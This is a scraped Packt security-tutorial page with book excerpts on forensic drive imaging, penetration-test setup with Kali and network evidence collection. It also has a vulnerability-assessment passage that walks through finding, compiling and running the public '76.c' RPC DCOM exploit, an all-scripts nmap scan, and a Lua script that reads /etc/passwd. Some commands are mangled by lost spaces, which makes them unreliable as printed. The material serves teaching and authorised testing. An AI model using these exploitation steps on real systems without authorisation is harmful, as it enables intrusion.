Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon

How-To Tutorials - Security

174 Articles
article-image-windows-drive-acquisition
Packt
21 Jul 2017
13 min read
Save for later

Windows Drive Acquisition

Packt
21 Jul 2017
13 min read
In this article, by Oleg Skulkin and Scar de Courcier, authors of Windows Forensics Cookbook, we  will cover drive acquisition in E01 format with FTK Imager, drive acquisition in RAW Format with DC3DD, and mounting forensic images with Arsenal Image Mounter. (For more resources related to this topic, see here.) Before you can begin analysing evidence from a source, it first of all, needs to be imaged. This describes a forensic process in which an exact copy of a drive is taken. This is an important step, especially if evidence needs to be taken to court because forensic investigators must be able to demonstrate that they have not altered the evidence in any way. The term forensic image can refer to either a physical or a logical image. Physical images are precise replicas of the drive they are referencing, whereas a logical image is a copy of a certain volume within that drive. In general, logical images show what the machine’s user will have seen and dealt with, whereas physical images give a more comprehensive overview of how the device works at a higher level. A hash value is generated to verify the authenticity of the acquired image. Hash values are essentially cryptographic digital fingerprints which show whether a particular item is an exact copy of another. Altering even the smallest bit of data will generate a completely new hash value, thus demonstrating that the two items are not the same. When a forensic investigator images a drive, they should generate a hash value for both the original drive and the acquired image. Some pieces of forensic software will do this for you. There are a number of tools available for imaging hard drives, some of which are free and open source. However, the most popular way for forensic analysts to image hard drives is by using one of the more well-known forensic software vendors solutions. This is because it is imperative to be able to explain how the image was acquired and its integrity, especially if you are working on a case that will be taken to court. Once you have your image, you will then be able to analyse the digital evidence from a device without directly interfering with the device itself. In this chapter, we will be looking at various tools that can help you to image a Windows drive, and taking you through the process of acquisition. Drive acquisition in E01 format with FTK Imager FTK Imager is an imaging and data preview tool by AccessData, which allows an examiner not only to create forensic images in different formats, including RAW, SMART, E01 and AFF, but also to preview data sources in a forensically sound manner. In the first recipe of this article, we will show you how to create a forensic image of a hard drive from a Windows system in E01 format. E01 or EnCase's Evidence File is a standard format for forensic images in law enforcement. Such images consist of a header with case info, including acquisition date and time, examiner's name, acquisition notes, and password (optional), bit-by-bit copy of an acquired drive (consists of data blocks, each is verified with its own CRC or Cyclical Redundancy Check), and a footer with MD5 hash for the bitstream.  Getting ready First of all, let's download FTK Imager from AccessData website. To do it, go to SOLUTIONS tab, and after - to Product Downloads. Now choose DIGITAL FORENSICS, and after - FTK Imager. At the time of this writing, the most up-to-date version is 3.4.3, so click DOWNLOAD PAGE green button on the right. Ok, now you should be at the download page. Click on DOWNLOAD NOW button and fill in the form, after this you'll get the download link to the email you provided. The installation process is quite straightforward, all you need is just click Next a few times, so we won't cover it in the recipe. How to do it... There are two ways of initiating drive imaging process: Using Create Disk Image button from the Toolbar as shown in the following figure: Create Disk Image button on the Toolbar Use Create Disk Image option from the File menu as shown in the following figure: Create Disk Image... option in the File Menu You can choose any option you like. The first window you see is Select Source. Here you have five options: Physical Drive: This allows you to choose a physical drive as the source, with all partitions and unallocated space Logical Drive: This allows you to choose a logical drive as the source, for example, E: drive Image File: This allows you to choose an image file as the source, for example, if you need to convert you forensic image from one format to another Contents of a Folder: This allows you to choose a folder as the source, of course, no deleted files, and so on will be included Fernico Device: This allows you to restore images from multiple CD/DVD Of course, we want to image the whole drive to be able to work with deleted data and unallocated space, so: Let's choose Physical Drive option. Evidence source mustn't be altered in any way, so make sure you are using a hardware write blocker, you can use the one from Tableau, for example. These devices allow acquisition of  drive contents without creating the possibility of modifying the data.  FTK Imager Select Source window Click Next and you'll see the next window - Select Drive. Now you should choose the source drive from the drop down menu, in our case it's .PHYSICALDRIVE2. FTK Imager Select Drive window Ok, the source drive is chosen, click Finish. Next window - Create Image. We'll get back to this window soon, but for now, just click Add...  It's time to choose the destination image type. As we decided to create our image in EnCase's Evidence File format, let's choose E01. FTK Imager Select Image Type window Click Next and you'll see Evidence Item Information window. Here we have five fields to fill in: Case Number, Evidence Number, Unique Description, Examiner and Notes. All fields are optional. FTK Imager Evidence Item Information window Filled the fields or not, click Next. Now choose image destination. You can use Browse button for it. Also, you should fill in image filename. If you want your forensic image to be split, choose fragment size (in megabytes). E01 format supports compression, so if you want to reduce the image size, you can use this feature, as you can see in the following figure, we have chosen 6. And if you want the data in the image to be secured, use AD Encryption feature. AD Encryption is a whole image encryption, so not only is the raw data encrypted, but also any metadata. Each segment or file of the image is encrypted with a randomly generated image key using AES-256. FTK Imager Select Image Destination window Ok, we are almost done. Click Finish and you'll see Create Image window again. Now, look at three options at the bottom of the window. The verification process is very important, so make sure Verify images after they are created option is ticked, it helps you to be sure that the source and the image are equal. Precalculate Progress Statistics option is also very useful: it will show you estimated time of arrival during the imaging process. The last option will create directory listings of all files in the image for you, but of course, it takes time, so use it only if you need it.  FTK Imager Create Image window All you need to do now is to click Start. Great, the imaging process has been started! When the image is created, the verification process starts. Finally, you'll get Drive/Image Verify Results window, like the one in the following figure: FTK Imager Drive/Image Verify Results window As you can see, in our case the source and the image are identical: both hashes matched. In the folder with the image, you will also find an info file with valuable information such as drive model, serial number, source data size, sector count, MD5 and SHA1 checksums, and so on. How it works... FTK Imager uses the physical drive of your choice as the source and creates a bit-by-bit image of it in EnCase's Evidence File format. During the verification process, MD5 and SHA1 hashes of the image and the source are being compared. See more FTK Imager download page: http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.3 FTK Imager User Guide: https://ad-pdf.s3.amazonaws.com/Imager/3_4_3/FTKImager_UG.pdf Drive acquisition in RAW format with DC3DD DC3DD is a patched (by Jesse Kornblum) version of classic GNU DD utility with some computer forensics features. For example, the fly hashing with a number of algorithms, such as MD5, SHA-1, SHA-256, and SHA-512, showing the progress of the acquisition process, and so on. Getting ready You can find a compiled stand alone 64 bit version of DC3DD for Windows at Sourceforge. Just download the ZIP or 7z archive, unpack it, and you are ready to go. How to do it... Open Windows Command Prompt and change directory (you can use cd command to do it) to the one with dc3dd.exe, and type the following command: dc3dd.exe if=.PHYSICALDRIVE2 of=X:147-2017.dd hash=sha256 log=X:147-2017.log Press Enter and the acquisition process will start. Of course, your command will be a bit different, so let's find out what each part of it means: if: It stands for input file, yes, originally DD is a Linux utility, and, if you don't know, everything is a file in Linux, as you can see in our command, we put physical drive 2 here (this is the drive we wanted to image, but in your case it can be another drive, depend on the number of drives connected to your workstation). of: It stands for output file, here you should type the destination of your image, as you remember, in RAW format, in our case it's X: drive and 147-2017.dd file. hash: As it's already been said, DC3DD supports four hashing algorithms: MD5, SHA-1, SHA-256, and SHA-512, we chose SHA-256, but you can choose the one you like. log: Here you should type the destination for the logs, you will find the image version, image hash, and so on in this file after acquisition is completed. How it works... DC3DD creates bit-by-bit image of the source drive n RAW format, so the size of the image will be the same as source, and calculates the image hash using the algorithm of the examiner's choice, in our case SHA-256. See also DC3DD download page: https://sourceforge.net/projects/dc3dd/files/dc3dd/7.2%20-%20Windows/ Mounting forensic images with Arsenal Image Mounter Arsenal Image Mounter is an open source tool developed by Arsenal Recon. It can help a digital forensic examiner to mount a forensic image or virtual machine disk in Windows. It supports both E01 (and Ex01) and RAW forensic images, so you can use it with any of the images we created in the previous recipes. It's very important to note, that Arsenal Image Mounter mounts the contents of disk images as complete disks. The tool supports all file systems you can find on Windows drives: NTFS, ReFS, FAT32 and exFAT. Also, it has temporary write support for images and it's very useful feature, for example, if you want to boot system from the image you are examining. Getting ready Go to Arsenal Image Mounter web page at Arsenal Recon website and click on Download button to download the ZIP archive. At the time of this writing the latest version of the tool is 2.0.010, so in our case, the archive has the name  Arsenal_Image_Mounter_v2.0.010.0_x64.zip. Extract it to a location of your choice and you are ready to go, no installation is needed. How to do it... There two ways to choose an image for mounting in Arsenal Image Mounter: You can use File menu and choose Mount image. Use the Mount image button as shown in the following figure:  Arsenal Image Mounter main window When you choose Mount image option from File menu or click on Mount image button, Open window will popup - here you should choose an image for mounting. The next windows you will see - Mount options, like the one in the following figure:  Arsenal Image Mounter Mount options window As you can see, there are a few options here: Read only: If you choose this option, the image is mounted in read-only mode, so no write operations are allowed (Do you still remember that you mustn't alter the evidence in any way? Of course, it's already an image, not the original drive, but nevertheless).Fake disk signatures: If an all-zero disk signature is found on the image, Arsenal Image Mounter reports a random disk signature to Windows, so it's mounted properly. Write temporary: If you choose this option, the image is mounted in read-write mode, but all modifications are written not in the original image file, but to a temporary differential file. Write original: Again, this option mounts the image in read-write mode, but this time the original image file will be modified. Sector size: This option allows you to choose sector size. Create "removable" disk device: This option emulates the attachment of a USB thumb drive.   Choose the options you think you need and click OK. We decided to mount our image as read only. Now you can see a hard drive icon on the main windows of the tool - the image is mounted. If you mounted only one image and want to unmount it- select the image and click on Remove selected button. If you have a few mounted images and want to unmount all of them - click on Remove all button. How it works... Arsenal Image Mounter mounts forensic images or virtual machine disks as complete disks in read-only or read-write mode. Later, a digital forensics examiner can access their contents even with Windows Explorer. See also Arsenal Image Mounter page at Arsenal Recon website: https://arsenalrecon.com/apps/image-mounter/ Summary In this article, the author has explained about the process and importance of drive acquisition using imaging software's which are available with well-known forensic software vendors such as FTK Imager and DC3DD. Drive acquisition being the first step in the analysis of digital evidence, need to be carried out with utmost care which in turn will make the analysis process smooth. Resources for Article: Further resources on this subject: Forensics Recovery [article] Digital and Mobile Forensics [article] Mobile Forensics and Its Challanges [article]
Read more
  • 0
  • 0
  • 6716

article-image-vulnerability-assessment
Packt
21 Jul 2017
11 min read
Save for later

Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well. Other online sites that collect, analyze, and share information about vulnerabilities are as follows: The National vulnerability database that consolidates all public vulnerability data released by the US Government available at http://web.nvd.nist.gov/view/vuln/search Secunia available at http://secunia.com/community/ Open Source Vulnerability Database Project (OSVDP) available at http://www.osvdb.org/search/advsearch Packetstorm security available at http://packetstormsecurity.com/ SecurityFocus available at http://www.securityfocus.com/vulnerabilities Inj3ct0r available at http://1337day.com/ The Exploit database maintained by Offensive Security available at http://www.db-exploit.com The Exploit database is also copied locally to Kali and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following command: cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjfarchive.tar.bz2 rmarchive.tar.bz2 To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) in the Command Prompt. This will invoke a script that searches a database file (.csv) that contains a list of all exploits. The search will return a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vulnerabilities: The search script scans for each line in the CSV file from left to right, so the order of the search terms is important—a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is weirdly case sensitive; although you are instructed to use lower case characters in the search term, a search for bulletproof FTP returns no hits, but bulletproof FTP returns seven hits, and bulletproof FTP returns no hits. More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite). A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment, and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts such as Perl, Ruby, and PHP are relatively easy to implement. For example, if the target is a Microsoft II 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute as a standard Perl script, as shown in the following screenshot: Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot: The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable. So we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the command as follows: root@kali:~# gcc76.c -o 76.exe This will use the GNU Compiler Collection application to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot: When you invoke the application against the target, you must call the executable (which is not stored in the /tmp directory) using a symbolic link as follows: root@kali:~# ./76.exe The source code for this exploit is well documented and the required parameters are clear at the execution, as shown in the following screenshot: Unfortunately, not all exploits from exploit database and other public sources compiled as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers listed as follows: Deliberate errors or incomplete source code are commonly encountered as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions. Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to be used to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development. Inconsistent behaviors due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer. There is always the risk of freely available code containing malicious functionalities. A penetration tester may think that they are conducting a proof of concept (POC) exercise and will be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer. To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework. Vulnerability scanning with nmap There are no security operating distributions without nmap, so far we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services, but also engage the nmap to perform the vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40 and it ships with 500+ NSE (nmap scripting engine) scripts, as shown in the following screenshot: Penetration testers utilize nmap's most powerful and flexible features, which allows them to write their own scripts and also automate them to ease the exploitation. Primarily the NSE was developed for the following reasons: Network discovery: Primary purpose that attackers would utilize the nmap is for the network discovery. Classier version detection of a service: There are 1000's of services with multiple version details to the same service, so make it more sophisticated. Vulnerability detection: To automatically identify vulnerability in a vast network range; however, nmap itself cannot be a fully vulnerability scanner in itself. Backdoor detection: Some of the scripts are written to identify the pattern if there are any worms infections on the network, it makes the attackers job easy to narrow down and focus on taking over the machine remotely. Vulnerability exploitation: Attackers can also potentially utilize nmap to perform exploitation in combination with other tools such as Metasploit or write a custom reverse shell code and combine nmap's capability of exploitation. Before firing the nmap to perform the vulnerability scan, penetration testers must update the nmap script db to see if there are any new scripts added to the database so that they don't miss the vulnerability identification: nmap –script-updatedb Running for all the scripts against the target host: nmap-T4 -A -sV -v3 -d –oATargetoutput --script all --script-argsvulns.showalltarget.com Introduction to LUA scripting Light weight embeddable scripting language, which is built on top of the C programming language, was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. Complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (which is less than a floppy disk). Some of the security tools that are developed in LUA are nmap, Wireshark, and Snort 3.0. One of the reasons why LUA is chosen to be the scripting language in Information security is due to the compactness, no buffer overflows and format string vulnerabilities, and it can be interpreted. LUA can be installed directly to Kali Linux by issuing the apt-get install lua5.1 command on the Terminal. The following code extract is the sample script to read the file and print the first line: #!/usr/bin/lua local file = io.open("/etc/passwd", "r") contents = file:read() file:close() print (contents) LUA is similar to any other scripting such as bash and PERL scripting. The preceding script should produce the output as shown in the following screenshot: Customizing NSE scripts In order to achieve maximum effectiveness, customization of scripts helps penetration testers in finding the right vulnerabilities within the given span of time. However, attackers do not have the time limit. The following code extract is a LUANSE script to identify a specific file location that we will search on the entire subnet using nmap: local http=require 'http' description = [[ This is my custom discovery on the network ]] categories = {"safe","discovery"} require("http") functionportrule(host, port) returnport.number == 80 end function action(host, port) local response response = http.get(host, port, "/test.txt") ifresponse.status and response.status ~= 404 then return "successful" end end Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested as shown in the following screenshot; you must be able to run your own NSE script without any problems: To completely understand the preceding NSE script here is the description of what is in the code: local http: requires HTTP – calling the right library from the LUA, the line calls the HTTP script and made it a local request. Description: Where testers/researchers can enter the description of the script. Categories: This typically has two variables, where one declares whether it is safe or intrusive.  
Read more
  • 0
  • 0
  • 3288

article-image-planning-and-preparation
Packt
05 Jul 2017
9 min read
Save for later

Planning and Preparation

Packt
05 Jul 2017
9 min read
In this article by Jason Beltrame, authors of the book Penetration Testing Bootcamp, Proper planning and preparation is key to a successful penetration test. It is definitely not as exciting as some of the tasks we will do within the penetration test later, but it will lay the foundation of the penetration test. There are a lot of moving parts to a penetration test, and you need to make sure that you stay on the correct path and know just how far you can and should go. The last thing you want to do in a penetration test is cause a customer outage because you took down their application server with an exploit test (unless, of course, they want us to get to that depth) or scanned the wrong network. Performing any of these actions would cause our penetration-testing career to be a rather short-lived career. In this article, following topics will be covered: Why does penetration testing take place? Building the systems for the penetration test Penetration system software setup (For more resources related to this topic, see here.) Why does penetration testing take place? There are many reasons why penetration tests happen. Sometimes, a company may want to have a stronger understanding of their security footprint. Sometimes, they may have a compliance requirement that they have to meet. Either way, understanding why penetration testing is happening will help you understand the goal of the company. Plus, it will also let you know whether you are performing an internal penetration test or an external penetration test. External penetration tests will follow the flow of an external user and see what they have access to and what they can do with that access. Internal penetration tests are designed to test internal systems, so typically, the penetration box will have full access to that environment, being able to test all software and systems for known vulnerabilities. Since tests have different objectives, we need to treat them differently; therefore, our tools and methodologies will be different. Understanding the engagement One of the first tasks you need to complete prior to starting a penetration test is to have a meeting with the stakeholders and discuss various data points concerning the upcoming penetration test. This meeting could be you as an external entity performing a penetration test for a client or you as an internal security employee doing the test for your own company. The important element here is that the meeting should happen either way, and the same type of information needs to be discussed. During the scoping meeting, the goal is to discuss various items of the penetration test so that you have not only everything you need, but also full management buy-in with clearly defined objectives and deliverables. Full management buy-in is a key component for a successful penetration test. Without it, you may have trouble getting required information from certain teams, scope creep, or general pushback. Building the systems for the penetration test With a clear understanding of expectations, deliverables, and scope, it is now time to start working on getting our penetration systems ready to go. For the hardware, I will be utilizing a decently powered laptop. The laptop specifications are a Macbook Pro with 16 GB of RAM, 256 GB SSD, and a quad-core 2.3 Ghz Intel i7 running VMware Fusion. I will also be using the Raspberry Pi 3. The Raspberry Pi 3 is a 1.2 Ghz ARMv8 64-bit Quad Core, with 1GB of RAM and a 32 GB microSD. Obviously, there is quite a power discrepancy between the laptop and the Raspberry Pi. That is okay though, because I will be using both these devices differently. Any task that requires any sort of processing power will be done on the laptop. I love using the Raspberry Pi because of its small form factor and flexibility. It can be placed in just about any location we need, and if needed, it can be easily concealed. For software, I will be using Kali Linux as my operating system of choice. Kali is a security-oriented Linux distribution that contains a bunch of security tools already installed. Its predecessor, Backtrack, was also a very popular security operating system. One of the benefits of Kali Linux is that it is also available for the Raspberry Pi, which is perfect in our circumstance. This way, we can have a consistent platform between devices we plan to use in our penetration-testing labs. Kali Linux can be downloaded from their site at https://www.kali.org. For the Raspberry Pi, the Kali images are managed by Offensive Security at https://www.offensive-security.com. Even though I am using Kali Linux as my software platform of choice, feel free to use whichever software platform you feel most comfortable with. We will be using a bunch of open source tools for testing. A lot of these tools are available for other distributions and operating systems. Penetration system software setup Setting up Kali Linux on both systems is a bit different since they are different platforms. We won't be diving into a lot of details on the install, but we will be hitting all the major points. This is the process you can use to get the software up and running. We will start with the installation on the Raspberry Pi: Download the images from Offensive Security at https://www.offensive-security.com/kali-linux-arm-images/. Open the Terminal app on OS X. Using the utility xz, you can decompress the Kali image that was downloaded: xz-dkali-2.1.2-rpi2.img.xz Next, you insert the USB microSD card reader with the microSD card into the laptop and verify the disks that are installed so that you know the correct disk to put the Kali image on: diskutillist Once you know the correct disk, you can unmount the disk to prepare to write to it: diskutilunmountDisk/dev/disk2 Now that you have the correct disk unmounted, you will want to write the image to it using the dd command. This process can take some time, so if you want to check on the progress, you can run the Ctrl + T command anytime: sudoddif=kali-2.1.2-rpi2.imgof=/dev/disk2bs=1m Since the image is now written to the microSD drive, you can eject it with the following command: diskutileject/dev/disk2 You then remove the USB microSD card reader, place the microSD card in the Raspberry Pi, and boot it up for the first time. The default login credentials are as follows: Username:root Password:toor You then change the default password on the Raspberry Pi to make sure no one can get into it with the following command: Passwd<INSERTPASSWORDHERE> Making sure the software is up to date is important for any system, especially a secure penetration-testing system. You can accomplish this with the following commands: apt-getupdate apt-getupgrade apt-getdist-upgrade After a reboot, you are ready to go on the Raspberry Pi. Next, it's onto setting up the Kali Linux install on the Mac. Since you will be installing Kali as a VM within Fusion, the process will vary compared to another hypervisor or installing on a bare metal system. For me, I like having the flexibility of having OS X running so that I can run commands on there as well: Similar to the Raspberry Pi setup, you need to download the image. You will do that directly via the Kali website. They offer virtual images for downloads as well. If you go to select these, you will be redirected to the Offensive Security site at https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/. Now that you have the Kali Linux image downloaded, you need to extract the VMDK. We used 7z via CLI to accomplish this task: Since the VMDK is ready to import now, you will need to go into VMware Fusion and navigate to File | New. A screen similar to the following should be displayed: Click on Create a custom virtual machine. You can select the OS as Other | Other and click on Continue: Now, you will need to import the previously decompressed VMDK. Click on the Use an existing virtual disk radio button, and hit Choose virtual disk. Browse the VMDK. Click on Continue. Then, on the last screen, click on the Finish button. The disk should now start to copy. Give it a few minutes to complete: Once completed, the Kali VM will now boot. Log in with the credentials we used in the Raspberry Pi image: Username:root Password:toor You need to then change the default password that was set to make sure no one can get into it. Open up a terminal within the Kali Linux VM and use the following command: Passwd<INSERTPASSWORDHERE> Make sure the software is up to date, like you did for the Raspberry Pi. To accomplish this, you can use the following commands: apt-getupdate apt-getupgrade apt-getdist-upgrade Once this is complete, the laptop VM is ready to go. Summary Now that we have reached the end of this article, we should have everything that we need for the penetration test. Having had the scoping meeting with all the stakeholders, we were able to get answers to all the questions that we required. Once we completed the planning portion, we moved onto the preparation phase. In this case, the preparation phase involved setting up Kali Linux on both the Raspberry Pi as well as setting it up as a VM on the laptop. We went through the steps of installing and updating the software on each platform as well as some basic administrative tasks. Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Web app penetration testing in Kali [article] BackTrack 4: Security with Penetration Testing Methodology [article]
Read more
  • 0
  • 0
  • 2821

article-image-network-evidence-collection
Packt
05 Jul 2017
16 min read
Save for later

Network Evidence Collection

Packt
05 Jul 2017
16 min read
In this article by Gerard Johansen, author of the book Digital Forensics and Incident Response, explains that the traditional focus of digital forensics has been to locate evidence on the host hard drive. Law enforcement officers interested in criminal activity such as fraud or child exploitation can find the vast majority of evidence required for prosecution on a single hard drive. In the realm of Incident Response though, it is critical that the focus goes far beyond a suspected compromised system. There is a wealth of information to be obtained within the points along the flow of traffic from a compromised host to an external Command and Control server for example. (For more resources related to this topic, see here.) This article focuses on the preparation, identification and collection of evidence that is commonly found among network devices and along the traffic routes within an internal network. This collection is critical during an incident where an external threat sources is in the process of commanding internal systems or is in the process of pilfering data out of the network. Network based evidence is also useful when examining host evidence as it provides a second source of event corroboration which is extremely useful in determining the root cause of an incident. Preparation The ability to acquire network-based evidence is largely dependent on the preparations that are untaken by an organization prior to an incident. Without some critical components of a proper infrastructure security program, key pieces of evidence will not be available for incident responders in a timely manner. The result is that evidence may be lost as the CSIRT members hunt down critical pieces of information. In terms of preparation, organizations can aid the CSIRT by having proper network documentation, up to date configurations of network devices and a central log management solution in place. Aside from the technical preparation for network evidence collection, CSIRT personnel need to be aware of any legal or regulatory issues in regards to collecting network evidence. CSIRT personnel need to be aware that capturing network traffic can be considered an invasion of privacy absent any other policy. Therefore, the legal representative of the CSIRT should ensure that all employees of the organization understand that their use of the information system can be monitored. This should be expressly stated in policies prior to any evidence collection that may take place. Network diagram To identify potential sources of evidence, incident responders need to have a solid understanding of what the internal network infrastructure looks like. One method that can be employed by organizations is to create and maintain an up to date network diagram. This diagram should be detailed enough so that incident responders can identify individual network components such as switches, routers or wireless access points. This diagram should also contain internal IP addresses so that incident responders can immediately access those systems through remote methods. For instance, examine the below simple network diagram: This diagram allows for a quick identification of potential evidence sources. In the above diagram, for example, suppose that the laptop connected to the switch at 192.168.2.1 is identified as communicating with a known malware Command and Control server. A CSIRT analyst could examine the network diagram and ascertain that the C2 traffic would have to traverse several network hardware components on its way out of the internal network. For example, there would be traffic traversing the switch at 192.168.10.1, through the firewall at 192.168.0.1 and finally the router out to the Internet. Configuration Determining if an attacker has made modifications to a network device such as a switch or a router can be made easier if the CSIRT has a standard configuration immediately available. Organizations should already have configurations for network devices stored for Disaster Recovery purposes but should have these available for CSIRT members in the event that there is an incident. Logs and log management The lifeblood of a good incident investigation is evidence from a wide range of sources. Even something as a malware infection on a host system requires corroboration among a variety of sources. One common challenge with Incident Response, especially in smaller networks is how the organization handles log management. For a comprehensive investigation, incident response analysts need access to as much network data as possible. All to often, organizations do not dedicate the proper resources to enabling the comprehensive logs from network devices and other systems. Prior to any incident, it is critical to clearly define the how and what an organization will log and as well as how it will maintain those logs. This should be established within a log management policy and associated procedure. The CSIRT personnel should be involved in any discussion as what logs are necessary or not as they will often have insight into the value of one log source over another. NIST has published a short guide to log management available at: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf. Aside from the technical issues regarding log management, there are legal issues that must be addressed. The following are some issues that should be addressed by the CSIRT and its legal support prior to any incident. Establish logging as a normal business practice: Depending on the type of business and the jurisdiction, users may have a reasonable expectation of privacy absent any expressly stated monitoring policy. In addition, if logs are enabled strictly to determine a user's potential malicious activity, there may be legal issues. As a result, the logging policy should establish that logging of network activity is part of the normal business activity and that users do not have a reasonable expectation of privacy. Logging as close to the event: This is not so much an issue with automated logging as they are often created almost as the event occurs. From an evidentiary standpoint, logs that are not created close to the event lose their value as evidence in a courtroom. Knowledgeable Personnel: The value of logs is often dependent on who created the entry and whether or not they were knowledgeable about the event. In the case of logs from network devices, the logging software addresses this issue. As long as the software can be demonstrated to be functioning properly, there should be no issue. Comprehensive Logging: Enterprise logging should be configured for as much of the enterprise as possible. In addition, logging should be consistent. A pattern of logging that is random will have less value in a court than a consistent patter of logging across the entire enterprise. Qualified Custodian: The logging policy should name a Data Custodian. This individual would speak to the logging and the types of software utilized to create the logs. They would also be responsible for testifying to the accuracy of the logs and the logging software used. Document Failures: Prolonged failures or a history of failures in the logging of events may diminish their value in a courtroom. It is imperative that any logging failure be documented and a reason is associated with such failure. Log File Discovery: Organizations should be made aware that logs utilized within a courtroom proceeding are going to be made available to opposing legal counsel. Logs from compromised systems: Logs that originate from a known compromised system are suspect. In the event that these logs are to be introduced as evidence, the custodian or incident responder will often have to testify at length concerning the veracity of the data contained within the logs. Original copies are preferred: Log files can be copied from the log source to media. As a further step, any logs should be archived off the system as well. Incident responders should establish a chain of custody for each log file used throughout the incident and these logs maintained as part of the case until an order from the court is obtained allowing their destruction. Network device evidence There are a number of log sources that can provide CSIRT personnel and incident responders with good information. A range of manufacturers provides each of these network devices. As a preparation task, CSIRT personnel should become familiar on how to access these devices and obtain the necessary evidence: Switches: These are spread throughout a network through a combination of core switches that handle traffic from a range of network segments to edge switches which handle the traffic for individual segments. As a result, traffic that originates on a host and travels out the internal network will traverse a number of switches. Switches have two key points of evidence that should be addressed by incident responders. First is the Content Addressable Memory (CAM) table. This CAM table maps the physical ports on the switch to the Network Interface Card (NIC) on each device connected to the switch. Incident responders in tracing connections to specific network jacks can utilize this information. This can aid in the identification of possible rogue devices. The second way switches can aid in an incident investigation is through facilitating network traffic capture. Routers: Routers allow organizations to connect multiple LANs into either Metropolitan Area Networks or Wide Area Networks. As a result, the handled an extensive amount of traffic. The key piece of evidentiary information that routers contain is the routing table. This table holds the information for specific physical ports that map to the networks. Routers can also be configured to deny specific traffic between networks and maintain logs on allowed traffic and data flow. Firewalls: Firewalls have changed significantly since the days when they were considered just a different type of router. Next generation firewalls contain a wide variety of features such as Intrusion Detection and Prevention, Web filtering, Data Loss Prevention and detailed logs about allowed and denied traffic. Firewalls often times serve as the detection mechanism that alerts security personnel to potential incidents. Incident responders should have as much visibility into how their organization's firewalls function and what data can be obtained prior to an incident. Network Intrusion Detection and Prevention systems: These systems were purposefully designed to provide security personnel and incident responders with information concerning potential malicious activity on the network infrastructure. These systems utilize a 